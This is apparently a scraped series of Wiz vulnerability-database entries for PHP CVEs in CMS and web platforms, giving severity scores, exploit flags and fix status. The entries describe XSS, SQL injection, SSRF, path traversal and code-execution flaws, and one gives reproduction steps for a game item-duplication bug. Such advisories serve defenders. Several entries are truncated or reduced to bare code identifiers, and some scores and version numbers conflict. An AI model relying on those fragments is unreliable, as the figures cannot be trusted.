Has Public Exploit No
Wiz
CVE-2026-4587 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4587 [MEDIUM] CVE-2026-4587 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4587 :
PHP vulnerability analysis and mitigation
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This attack is characterized by high complexity. The exploitability is assessed as difficult. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 6.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2026-34989 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-34989 [CRITICAL] CVE-2026-34989 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34989 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 31.0.0.0, the application fails to properly sanitize user-controlled input when users update their profile name (e.g., full name / username). An attacker can inject a malicious JavaScript payload into their profile name, which is then stored server-side. This stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS). This vulnerability is fixed in 31.0.0.0.
Source : NVD
## 9.4
Score
Published April 6, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
PHP
Has Public Expl
Wiz
CVE-2026-31889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-31889 [HIGH] CVE-2026-31889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31889 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Prior to 6.6.10.15 and 6.7.8.1, a vulnerability in the Shopware app registration flow that could, under specific conditions, allow attackers to take over the communication channel between a shop and an app. The legacy app registration flow used HMAC‑based authentication without sufficiently binding a shop installation to its original domain. During re‑registration, the shop-url could be updated without proving control over the previously registered shop or domain. This made targeted hijacking of app communication feasible if an attacker possessed the relevant app‑side secret. By abusing app re‑registration, an attacker could redirect app traffic to an attacker‑controlled domain and potent
Wiz
CVE-2026-33035 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33035 [MEDIUM] CVE-2026-33035 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33035 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 25.0 and below, there is a reflected XSS vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser. User input from a URL parameter flows through PHP's json_encode() into a JavaScript function that renders it via innerHTML, bypassing encoding and achieving full script execution. The vulnerability is caused by two issues working together: unescaped user input passed to JavaScript (videoNotFound.php), and innerHTML rendering HTML tags as executable DOM (script.js). The attack can be escalated to steal session cookies, take over accounts, phish credentials via injected login forms, spread self-propagating payloads, and compro
Wiz
CVE-2026-28425 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2026-28425 [HIGH] CVE-2026-28425 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28425 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, an authenticated control panel user with access to Antlers-enabled inputs may be able to achieve remote code execution in the application context. That can lead to full compromise of the application, including access to sensitive configuration, modification or exfiltration of data, and potential impact on availability. Exploitation is only possible where Antlers runs on user-controlled content—for example, content fields with Antlers explicitly enabled (requiring permission to configure fields and to edit entries), built-in config that supports Antlers such as Forms email notification settings (requiring configuration p
Wiz
CVE-2026-32262 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-32262 [MEDIUM] CVE-2026-32262 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32262 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.5 and from version 5.0.0-RC1 to before version 5.9.11, the AssetsController->replaceFile() method has a targetFilename body parameter that is used unsanitized in a deleteFile() call before Assets::prepareAssetName() is applied on save. This allows an authenticated user with replaceFiles permission to delete arbitrary files within the same filesystem root by injecting ../ path traversal sequences into the filename. This could allow an authenticated user with replaceFiles permission on one volume to delete files in other folders/volumes that share the same filesystem root. This only affects local filesystems. This issue has been patched
Wiz
CVE-2026-33770 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33770 [HIGH] CVE-2026-33770 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33770 :
PHP vulnerability analysis and mitigation
fixCleanTitle()
objects/category.php
$clean_title
$id
Source : NVD
## 7.1
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publi
Wiz
CVE-2026-23493 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-23493 [HIGH] CVE-2026-23493 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23493 :
PHP vulnerability analysis and mitigation
Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend. This vulnerability is fixed in 12.3.1 and 11.5.14.
Source : NVD
## 4.9
Score
Published January 15, 2026
Severity MEDIUM
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pimcore/pimcore
Sources
NV
Wiz
CVE-2026-32276 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-32276 [HIGH] CVE-2026-32276 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32276 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an authenticated user may be able to execute arbitrary code in the Code Study Plugin. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 24, 2026
## Get a CVE
Wiz
CVE-2026-35537 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35537 [MEDIUM] CVE-2026-35537 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35537 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Unsafe deserialization in the redis/memcache session handler may lead to arbitrary file write operations by unauthenticated attackers via crafted session data.
Source : NVD
## 3.7
Score
Published April 3, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 12, 13, 14 Severity LOW Has Fix Added at: Apr 05, 2026
Echo Severity LOW Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-27128 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27128 [MEDIUM] CVE-2026-27128 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27128 :
PHP vulnerability analysis and mitigation
getTokenRoute()
Source : NVD
## 6.9
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prio
Wiz
CVE-2026-34729 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-34729 [MEDIUM] CVE-2026-34729 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34729 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, there is a stored XSS vulnerability via Regex Bypass in Filter::removeAttributes(). This issue has been patched in version 4.1.1.
Source : NVD
## 6.1
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
phpmyfaq/phpmyfaq
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploi
Wiz
CVE-2026-33237 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-33237 [MEDIUM] CVE-2026-33237 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33237 :
PHP vulnerability analysis and mitigation
run()
plugin/Scheduler/Scheduler.php
url_get_contents()
callbackURL
isValidURL()
isSSRFSafeURL()
callbackURL
Source : NVD
## 5.5
Score
Published March 21, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Te
Wiz
CVE-2026-34567 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34567 [CRITICAL] CVE-2026-34567 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34567 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts within the Categories section. An attacker can inject a malicious JavaScript payload into the Categories content, which is then stored server-side. This stored payload is later rendered unsafely when the Categories are viewed via blog posts, without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Affected
Wiz
CVE-2026-33080 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-33080 [HIGH] CVE-2026-33080 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33080 :
PHP vulnerability analysis and mitigation
Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.8.4 and 5.0.0 through 5.3.4 have two Filament Table summarizers (Range, Values) that render raw database values without escaping HTML. If there is a lack of validation for the data in the columns that use these summarizers, an attacker could plant malicious HTML / JavaScript and achieve stored XSS that executes for users who view the table with those summarizers. This issue has been patched in versions 4.8.5 and 5.3.5.
Source : NVD
## 5.4
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 7.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV
Wiz
CVE-2026-21896 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-21896 [MEDIUM] CVE-2026-21896 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21896 :
PHP vulnerability analysis and mitigation
Kirby is an open-source content management system. From versions 5.0.0 to 5.2.1, Kirby is missing permission checks in the content changes API. This vulnerability affects all Kirby sites where user permissions are configured to prevent specific role(s) from performing write actions, specifically by disabling the update permission with the intent to prevent modifications to site content. This vulnerability does not affect those who have not altered the deviated from default user permissions. This issue has been patched in version 5.2.2.
Source : NVD
## 5.8
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-34611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34611 [MEDIUM] CVE-2026-34611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34611 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo endpoint objects/emailAllUsers.json.php allows administrators to send HTML emails to every registered user on the platform. While the endpoint verifies admin session status, it does not validate a CSRF token. Because AVideo sets SameSite=None on session cookies, a cross-origin POST request from an attacker-controlled page will include the admin's session cookie automatically. An attacker who lures an admin to a malicious page can send an arbitrary HTML email to every user on the platform, appearing to originate from the instance's legitimate SMTP address. At time of publication, there are no publicly available patches.
Source : NVD
## 6.5
Wiz
CVE-2026-33296 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
CVE-2026-33296 [LOW] CVE-2026-33296 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33296 :
PHP vulnerability analysis and mitigation
document.location
Source : NVD
## 2.1
Score
Published March 22, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity LOW No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIGH
7.5
Wiz
CVE-2026-28696 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-28696 [HIGH] CVE-2026-28696 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28696 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.0-beta.1 and 5.9.0-beta.1, the GraphQL directive @parseRefs, intended to parse internal reference tags (e.g., {user:1:email}), can be abused by both authenticated users and unauthenticated guests (if a Public Schema is enabled) to access sensitive attributes of any element in the CMS. The implementation in Elements::parseRefs fails to perform authorization checks, allowing attackers to read data they are not authorized to view. This vulnerability is fixed in 4.17.0-beta.1 and 5.9.0-beta.1.
Source : NVD
## 8.7
Score
Published March 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV
Wiz
CVE-2026-24416 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24416 [HIGH] CVE-2026-24416 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24416 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the article pricing completion handler. The application fails to properly sanitize the idarticolo parameter before using it in SQL queries, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probabi
Wiz
CVE-2026-22242 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2026-22242 [MEDIUM] CVE-2026-22242 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22242 :
PHP vulnerability analysis and mitigation
CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8.
Source : NVD
## 4.9
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability
Wiz
CVE-2026-27939 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-27939 [HIGH] CVE-2026-27939 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27939 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). Starting in version 6.0.0 and prior to version 6.4.0, Authenticated Control Panel users may under certain conditions obtain elevated privileges without completing the intended verification step. This can allow access to sensitive operations and, depending on the user’s existing permissions, may lead to privilege escalation. This has been fixed in 6.4.0.
Source : NVD
## 8.8
Score
Published February 27, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5
Exploitation Probability (EPSS) N/A
Affected
Wiz
CVE-2026-35179 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35179 [MEDIUM] CVE-2026-35179 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35179 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the SocialMediaPublisher plugin exposes a publishInstagram.json.php endpoint that acts as an unauthenticated proxy to the Facebook/Instagram Graph API. The endpoint accepts user-controlled parameters including an access token, container ID, and Instagram account ID, and passes them directly to the Graph API via InstagramUploader::publishMediaIfIsReady(). This allows any unauthenticated user to make arbitrary Graph API calls through the server, potentially using stolen tokens or abusing the platform's own credentials.
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Wiz
CVE-2026-34372 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34372 [MEDIUM] CVE-2026-34372 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34372 :
PHP vulnerability analysis and mitigation
Sulu is an open-source PHP content management system based on the Symfony framework. From versions 1.0.0 to before 2.6.22, and 3.0.0 to before 3.0.5, a user which has permission for the Sulu Admin via at least one role could have access to the sub-entities of contacts via the admin API without even have permission for contacts. This issue has been patched in versions 2.6.22 and 3.0.5.
Source : NVD
## 5.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sulu/sulu
So
Wiz
CVE-2026-2898 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-2898 [MEDIUM] CVE-2026-2898 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2898 :
PHP vulnerability analysis and mitigation
A vulnerability was detected in funadmin up to 7.1.0-rc4. This issue affects the function getMember of the file app/common/service/AuthCloudService.php of the component Backend Endpoint. The manipulation of the argument cloud_account results in deserialization. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.1
Score
Published February 22, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
A
Wiz
CVE-2026-29069 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-29069 [MEDIUM] CVE-2026-29069 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29069 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.9.0-beta.2 and 4.17.0-beta.2, the actionSendActivationEmail() endpoint is accessible to unauthenticated users and does not require a permission check for pending users. An attacker with no prior access can trigger activation emails for any pending user account by knowing or guessing the user ID. If the attacker controls the target user’s email address, they can activate the account and gain access to the system. This vulnerability is fixed in 5.9.0-beta.2 and 4.17.0-beta.2.
Source : NVD
## 6.9
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-33182 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-33182 [MEDIUM] CVE-2026-33182 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33182 :
PHP vulnerability analysis and mitigation
Saloon is a PHP library that gives users tools to build API integrations and SDKs. Prior to version 4.0.0, when building the request URL, Saloon combined the connector's base URL with the request endpoint. If the endpoint was a valid absolute URL, the code used that URL as-is and ignored the base URL. The request—and any authentication headers, cookies, or tokens attached by the connector—was then sent to the attacker-controlled host. If the endpoint could be influenced by user input or configuration (e.g. redirect_uri, callback URL), this allowed server-side request forgery (SSRF) and/or credential leakage to a third-party host. The fix in version 4.0.0 is to reject absolute URLs in the endpoint: URLHelper::join() throws Inva
Wiz
GHSA-f9jp-856v-8642 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-f9jp-856v-8642 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-f9jp-856v-8642 :
PHP vulnerability analysis and mitigation
## Summary
World
World->getEntity($entityId)
World->getEntity($entityId)
## Reproducing steps
To reproduce this vulnerability, two clients (Player A and Player B) are required.
Prerequisites:
- Player A (Victim): Must have the valuable items to be duplicated in their inventory and 1 HP (to ensure instant death).
- Player B (Attacker): Must be equipped with a weapon capable of dealing at least 1 damage.
Steps:
1. Player A and Player B stand next to each other.
2. Player A initiates the disconnect sequence (e.g., clicking "Disconnect" or "Exit to Menu").
3. Immediately after Player A triggers the disconnect (within a split-second window), Player B must attack and kill Player A.
4. Player A's character dies server-si
Wiz
CVE-2026-33158 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2026-33158 [MEDIUM] CVE-2026-33158 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33158 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can read private asset content by calling assets/edit-image with an arbitrary assetId that they are not authorized to view. The endpoint returns image bytes (or a preview redirect) without enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files. This issue has been patched in versions 4.17.8 and 5.9.14.
Source : NVD
## 4.9
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Releas
Wiz
CVE-2026-33648 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33648 [HIGH] CVE-2026-33648 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33648 :
PHP vulnerability analysis and mitigation
users_id
liveTransmitionHistory_id
exec()
$()
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published dat
Wiz
GHSA-f3r2-88mq-9v4g Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-f3r2-88mq-9v4g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-f3r2-88mq-9v4g :
PHP vulnerability analysis and mitigation
## Description
In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens.
## Affected product and versions
Projects are affected if they meet the following preconditions:
Applications using the Auth0 Symfony SDK with versions between 5.0.0 and 5.5.0
Auth0 Symfony SDK uses the Auth0-PHP SDK with versions between 8.0.0 and 8.17.0.
## Resolution
Upgrade Auth0/symfony to version 5.6.0 or greater.
## Acknowledgement
Okta would like to thank Jafar Sadiq (iaf4r) for their discovery and responsible disclosure.
Source : NVD
## 6.8
Score
Published December 17, 2025
Sever
Wiz
CVE-2025-59020 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-59020 [MEDIUM] CVE-2025-59020 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59020 :
PHP vulnerability analysis and mitigation
By exploiting the defVals parameter, attackers could bypass field‑level access checks during record creation in the TYPO3 backend. This gave them the ability to insert arbitrary data into prohibited exclude fields of a database table for which the user already has write permission for a reduced set of fields. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source : NVD
## 5.3
Score
Published January 13, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Typo3
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.9
Exploitation Probability (EPSS)
Wiz
CVE-2026-33292 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33292 [HIGH] CVE-2026-33292 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33292 :
PHP vulnerability analysis and mitigation
view/hls.php
videoDirectory
/
..
Source : NVD
## 7.5
Score
Published March 22, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-
Wiz
CVE-2026-3242 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3242 [MEDIUM] CVE-2026-3242 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3242 :
PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, a rogue administrator can add stored XSS via the Switch Language block. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks M3dium for reporting.
Source : NVD
## 4.8
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
concrete5/concrete5
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 05, 2026
## Get a CVE r
Wiz
CVE-2026-29176 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-29176 [MEDIUM] CVE-2026-29176 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29176 :
PHP vulnerability analysis and mitigation
